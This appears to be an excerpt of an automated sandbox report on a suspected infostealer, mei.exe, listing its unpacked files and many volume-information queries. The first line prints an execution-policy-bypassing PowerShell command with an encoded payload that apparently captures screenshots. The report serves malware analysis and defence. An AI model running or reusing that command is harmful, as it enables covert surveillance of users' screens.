              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabg
aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A0B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 89_2_00007FF7D7A0B340
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F9CF0 cpuid | 0_2_00007FF6313F9CF0
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\Desktop\mei.exe | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\Desktop\mei.exe | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\Desktop\mei.exe | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dll | VolumeInformation
Source: C:\Users\user\Desktop\mei.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dll | VolumeInformation
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\python311.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
